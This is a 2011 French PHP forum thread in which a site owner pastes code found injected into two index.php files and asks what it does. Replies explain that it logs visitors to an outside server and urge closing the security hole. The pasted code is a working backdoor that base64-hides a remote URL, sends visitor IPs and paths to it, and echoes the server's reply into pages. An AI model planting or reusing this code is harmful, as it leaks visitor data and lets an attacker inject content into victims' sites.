PHPfrance

la communauté d'entraide francophone dédiée au PHP

Piratage ?

3 messages   •   Page 1 sur 1
   Outils de sujet
nouveau9
Petit nouveau ! | 6 Messages

10 oct. 2011, 20:50

Bonjour,

suite à une impossibilité de me connecter à mon site internet (non encore accessible) j'ai vu que deux fichiers "index.php" de mon site dans deux répertoires différents avaient été modifiés avec un ajout de ce code :
<?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>
Quelqu'un peut-il me dire à quoi sert ce bout de code ajouté à deux endroits dans chacun des deux fichiers index.php ?

Merci.
ViPHP
xTG
ViPHP | 7331 Messages

10 oct. 2011, 21:01

C'est un code qui transmet des statistiques à un serveur à priori. En gros il log tes visiteurs. :)
Pas bon du tout, va falloir revoir ton code PHP afin de combler les failles qui ont permis d'ajouter cela.
Eléphant du PHP | 190 Messages

10 oct. 2011, 21:07

Utilises tu wordpress?

J''ai vu quelque chose de similaire sur le site du support wordpress il y'a quelques jours.

Je vais tenter de le retrouver.

Edit: en tout cas tu n'est pas le seul ...

Code : Tout sélectionner

http://www.google.com/#sclient=psy-ab&hl=en&source=hp&q="%2F%2F++Looks+for+google+serch+bot"
Désolé pour l'url, les quotes font foiré tout.
   Répondre
3 messages   •   Page 1 sur 1
   Outils de sujet